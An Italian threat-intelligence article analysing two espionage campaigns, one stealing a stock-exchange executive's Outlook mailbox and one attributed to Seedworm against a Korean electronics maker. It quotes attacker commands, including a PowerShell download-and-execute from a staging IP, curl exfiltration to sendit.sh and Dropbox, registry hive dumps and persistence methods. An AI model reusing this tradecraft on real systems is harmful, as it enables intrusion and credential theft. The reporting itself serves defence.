Spionaggio su executive di borsa e produttore coreano: due campagne mirate

Due campagne di spionaggio informatico emerse tra ottobre 2025 e febbraio 2026 mostrano quanto il furto di dati strategici sia ormai diventato una disciplina operativa ad alta precisione. La prima colpisce un executive senior di una borsa globale e sottrae per cinque mesi l’intera mailbox Outlook attraverso estrazioni incrementali, mirate e ripetute. La seconda viene attribuita a Seedworm, gruppo legato all’Iran e al Ministero dell’Intelligence e Sicurezza iraniano, e compromette un importante produttore sudcoreano di elettronica insieme ad altre organizzazioni distribuite in nove Paesi e su quattro continenti. Le due operazioni non condividono necessariamente lo stesso attore, ma rivelano una convergenza tattica evidente: uso di tool pubblici, abuso di servizi cloud legittimi, esfiltrazione stealth, sideloading di DLL, persistence tramite scheduled task o chiavi Run, escalation privilegiata e mimetizzazione dentro processi o percorsi che richiamano software affidabili. Il bersaglio finanziario offre informazioni su listing, enforcement, viaggi, contatti e decisioni market-moving; il bersaglio industriale espone proprietà intellettuale, credenziali, accessi downstream e intelligence utile a operazioni statali o para-statali. In entrambi i casi, la compromissione non punta al rumore operativo ma alla permanenza silenziosa.

L’operazione contro l’executive di borsa punta alla mailbox Outlook

La campagna contro l’executive senior inizia il 10 ottobre 2025 con l’installazione di due binari mascherati che girano come SYSTEM dopo una fase di escalation privilegiata locale. Il primo file, armsvc.exe, viene collocato in CSIDL_COMMON_APPDATA\adobe\arm\armsvc.exe e imita il servizio di aggiornamento di Adobe Acrobat Reader, mentre il secondo, oneservice.exe, viene posizionato in un percorso non standard associato a OneDrive. L’avvio tramite wininit.exe e service control manager consente agli operatori di inserire i binari dentro un flusso apparentemente compatibile con normali servizi Windows. Gli attaccanti creano inoltre una scheduled task per armsvc.exe con intervallo di cinque minuti e privilegio highest, garantendo esecuzione persistente e recupero rapido in caso di interruzione. Il cuore dell’operazione è un infostealer basato su Aspose, libreria .NET legittima riconfezionata in eseguibile standalone per convertire file OST in PST. Il binario viene rinominato con varianti temporanee come ts_9ea0.tmp e rilasciato in sottocartelle di temp, quindi invocato con parametri per password, percorso Outlook, output e intervallo date. La prima estrazione raccoglie dati dal 19 agosto 2025 in poi, mentre le successive restringono le finestre temporali ogni due-quattro settimane, trasformando la sottrazione della mailbox in un processo incrementale continuo fino al 17 febbraio 2026.

Dropbox e OneDrive diventano canali di esfiltrazione discreta

Il 12 novembre 2025 gli operatori completano l’handshake OAuth per Dropbox usando un’app registrata con client_id e client_secret riutilizzati. I codici di autorizzazione vengono ruotati per sessione e i dati vengono caricati tramite curl verso content.dropboxapi.com, riducendo il profilo di anomalia perché il traffico si appoggia a un servizio cloud legittimo e largamente usato in ambienti enterprise. Nello stesso periodo gli attaccanti registrano una task chiamata \Microsoft\Windows\Lenovo\CheckServerHealth, con trigger ogni 300 minuti, che esegue batch file in c:\windows\temp e reindirizza l’output verso file txt destinati alla successiva esfiltrazione. Da fine novembre viene aggiunto un secondo canale su OneDrive Personal. Gli operatori usano inizialmente onedrive.live.com, poi passano direttamente agli IP Microsoft 13.107.137.11 e 150.171.41.11 per evitare query DNS registrate. Questo passaggio rivela un’attenzione puntuale alla telemetria difensiva: non basta usare un servizio legittimo, bisogna anche ridurre gli indicatori osservabili nei log. Tra il 20 e il 21 novembre viene testato brevemente un canale alternativo con temp.sh su 51.91.79.17 attraverso tre upload HTTPS, ma l’opzione viene abbandonata. La campagna dimostra una strategia di esfiltrazione modulare, dove Dropbox, OneDrive, IP diretti e task ricreate periodicamente servono a mantenere continuità operativa senza introdurre malware rumoroso o infrastrutture facilmente attribuibili.

Persistence multipla e mascheramento rendono invisibile il furto della mailbox

La lunga permanenza nella rete dell’executive nasce da una combinazione di persistence multipla, nomi credibili e rotazione dei tempi di esecuzione. Le scheduled task vengono ricreate con intervalli variabili tra 300 e 1440 minuti, mentre i batch file cambiano nel tempo per evitare pattern troppo statici. Il 27 febbraio 2026 gli attaccanti aggiungono onedrivesync.exe in CSIDL_COMMON_APPDATA\microsoft onedrive\setup e lo registrano come task ogni tre minuti sotto il nome \Microsoft\Windows\MicrosoftOneDriveSyncServiceCore, simulando una componente di sincronizzazione Microsoft. L’ultima attività osservata il 19 marzo 2026 vede il lancio di armdriver.exe e il drop di te.host.dll in un percorso Intel, possibile preparazione a un’operazione di DLL sideloading, anche se te.exe non viene eseguito. La sottrazione della mailbox produce un impatto particolarmente critico perché consente accesso a negoziazioni esterne, deliberazioni interne, calendari, itinerari di viaggio, contatti e informazioni non pubbliche su listing, enforcement e eventi capaci di muovere il mercato. Gli attaccanti ottengono così una vista privilegiata sulle relazioni dell’executive, sui tempi decisionali e sulle informazioni sensibili prima della loro eventuale pubblicazione. L’assenza di binari firmati malevoli e l’uso di strumenti pubblici rendono difficile attribuire l’operazione a un gruppo noto, ma aumentano il valore tattico della campagna perché riducono la probabilità di rilevamento precoce.

Seedworm colpisce un produttore sudcoreano di elettronica

La seconda campagna viene attribuita a Seedworm, gruppo collegato all’Iran e noto per operazioni di intelligence contro organizzazioni strategiche. Il 20 febbraio 2026 gli attaccanti compromettono un importante produttore sudcoreano di elettronica, con attività concentrate nell’arco di circa una settimana. Il processo node.exe funge da genitore di tutte le fasi successive, indicando la presenza di un impianto Node.js già attivo nell’ambiente. Gli operatori scaricano payload PowerShell dal server di staging 179.43.177.220 su HTTP porta 8080 tramite comando powershell -NoProfile -Command “iex (New-Object Net.WebClient).DownloadString”, quindi usano curl.exe per recuperare a.dat e a.exe nella stessa directory random. La catena evidenzia un approccio rapido e aggressivo: download da staging esterno, uso di strumenti nativi o comuni, directory temporanee casuali e passaggio immediato a esecuzioni successive. L’obiettivo non appare casuale, perché il settore elettronico sudcoreano rappresenta un bersaglio ad alto valore per intelligence industriale, proprietà intellettuale, supply chain tecnologica e accessi indiretti a clienti globali. Seedworm non punta soltanto alla macchina infetta, ma all’ecosistema relazionale che circonda il produttore.

Sideloading con Fortemedia e SentinelOne carica ChromElevator

La campagna Seedworm sfrutta in modo preciso il DLL sideloading tramite binari firmati legittimi. Il primo caso coinvolge fmapp.exe, utility audio di Fortemedia, che carica fmapp.dll contenente ChromElevator, strumento progettato per il furto silenzioso di password, cookie e dati di carte dai browser Chromium. Il secondo caso utilizza sentinelmemoryscanner.exe, componente firmato SentinelOne, che sideloada sentinelagentcore.dll con funzionalità identiche di ChromElevator. L’uso di binari legittimi firmati consente agli attaccanti di aggirare controlli superficiali e di confondere l’attribuzione comportamentale, soprattutto in ambienti dove software audio, security tool o componenti enterprise sono già presenti. Node.exe orchestra entrambe le esecuzioni, fungendo da hub operativo tra staging, esecuzione payload, furto credenziali e successive fasi di reconnaissance. Il furto dai browser Chromium è particolarmente grave perché può esporre sessioni persistenti, cookie di autenticazione, password aziendali e dati di pagamento. In un ambiente manifatturiero high-tech, queste informazioni possono aprire accessi a portali fornitori, sistemi interni, piattaforme cloud, repository, sistemi di ticketing e servizi condivisi con clienti o partner.

Reconnaissance, credential theft e screenshot scandiscono l’intrusione

Dopo l’accesso iniziale, Seedworm avvia una fase intensa di reconnaissance tramite comandi PowerShell e utility Windows: whoami, whoami /all, hostname, ipconfig /all, net session, net user /domain, net group e wmic per enumerare prodotti antivirus. Dopo circa dodici minuti vengono catturati screenshot, seguiti dal download di script aggiuntivi come sp.ps1 da timetrakr.cloud per ulteriori acquisizioni visive. Gli attaccanti rubano hive SAM, SECURITY e SYSTEM tramite reg save, quindi impiegano un harvester che richiama CredUIPromptForWindowsCredentialsW e salva credenziali in C:\ProgramData\lopa.txt. Viene usato anche un tool di privilege escalation per estrarre TGT Kerberos attraverso abuso di GSS-API delegation senza password dell’utente privilegiato. Questa sequenza mostra una catena completa: identificazione del contesto, raccolta informazioni, furto credenziali locali e di dominio, acquisizione visiva, abuso Kerberos e preparazione di accesso ridondante. La campagna non si limita a installare un malware, ma costruisce rapidamente una mappa dell’ambiente compromesso per capire privilegi, difese, utenti, servizi e potenziali percorsi laterali.

Sendit.sh, proxy SOCKS5 e Run key mantengono accesso e esfiltrazione

La fase di esfiltrazione di Seedworm usa curl.exe verso sendit.sh con parametro -F file=@path, sfruttando un servizio pubblico per trasferire artefatti senza introdurre infrastruttura proprietaria facilmente bloccabile. Gli operatori creano anche un proxy SOCKS5 inverso, utile per mantenere accesso ridondante e instradare traffico attraverso la macchina compromessa. Durante burst di attività di circa un’ora, il gruppo interroga ipinfo.io ogni novanta secondi per verificare l’IP pubblico, alternando poi pause di ore che riducono la continuità osservabile nei log. La persistence viene impostata tramite chiave HKCU\Software\Microsoft\Windows\CurrentVersion\Run, con nome valore random lungo che punta a fmapp.exe. Tra il 22 e il 26 febbraio 2026 gli operatori ricreano directory random, rilanciano tool e aumentano la reconnaissance su scheduled task, servizi locali e gruppi. L’attività resta concentrata in una settimana, con un gap di circa 36 ore, ma la densità operativa è elevata. A differenza della campagna contro l’executive, Seedworm agisce in modo meno silenzioso nel tempo ma più aggressivo nella raccolta, con furto di credenziali multiplo, screenshot, proxy, escalation e sideloading ripetuto.

Le due campagne condividono persistenza, cloud e binari legittimi

Il confronto tra le operazioni mostra differenze di ritmo ma forti somiglianze tattiche. Nel caso della borsa globale, gli attaccanti mantengono accesso per cinque mesi, usano scheduled task, nomi che richiamano Lenovo, Adobe e Microsoft OneDrive, estrazioni incrementali OST/PST e canali Dropbox e OneDrive. Nel caso Seedworm, gli operatori agiscono in una finestra di circa una settimana, usano Run key, Node.js, PowerShell, ChromElevator, Fortemedia, SentinelOne, sendit.sh e SOCKS5. Entrambi i casi privilegiano tool pubblici o legittimi, riducono l’uso di malware custom evidente e sfruttano canali cloud o servizi pubblici per trasferire dati. Entrambi puntano a credenziali, informazioni sensibili e accessi riutilizzabili. La differenza principale sta nell’obiettivo operativo: l’operazione sulla borsa cerca continuità, discrezione e raccolta selettiva su informazioni market-moving; Seedworm cerca raccolta intensiva, accessi privilegiati e intelligence industriale su un target high-tech. In entrambi gli scenari, i controlli tradizionali basati solo su file malevoli rischiano di fallire perché gli indicatori più importanti si trovano nel comportamento: task sospette, processi firmati usati in modo anomalo, upload verso cloud, conversioni OST/PST, dump registry e abuso Kerberos.

Finanza e manifattura high-tech diventano bersagli di intelligence persistente

Le conseguenze delle due campagne sono profonde. Nel caso dell’executive di borsa, il furto prolungato della mailbox espone informazioni su listing, azioni di enforcement, comunicazioni interne, trattative esterne, calendari e viaggi. Dati di questo tipo possono alimentare frodi, insider trading, targeting fisico, social engineering e anticipazione di eventi market-moving. Nel caso del produttore sudcoreano di elettronica, la compromissione mette a rischio proprietà intellettuale, credenziali, accessi a clienti downstream, documentazione tecnica e informazioni industriali strategiche. La più ampia attività di Seedworm, con almeno nove organizzazioni colpite in nove Paesi e su quattro continenti, estende il rischio a manifattura industriale, elettronica, educazione, settore pubblico, servizi finanziari, servizi professionali e persino infrastrutture aeroportuali. La convergenza tra spionaggio finanziario e spionaggio industriale dimostra che i target ad alto valore non vengono più colpiti solo per interruzione operativa o ransomware, ma per accesso continuo a informazioni non pubbliche. Le organizzazioni devono quindi monitorare conversioni anomale di mailbox Outlook, uso sospetto di Aspose, accessi cloud diretti verso Dropbox e OneDrive, esecuzioni Node.js non attese, sideloading di DLL, dump SAM/SECURITY/SYSTEM, uso di curl verso servizi pubblici e modifiche a Run key o scheduled task. La difesa efficace passa dalla capacità di leggere queste micro-anomalie come parti di una campagna di intelligence, non come eventi isolati.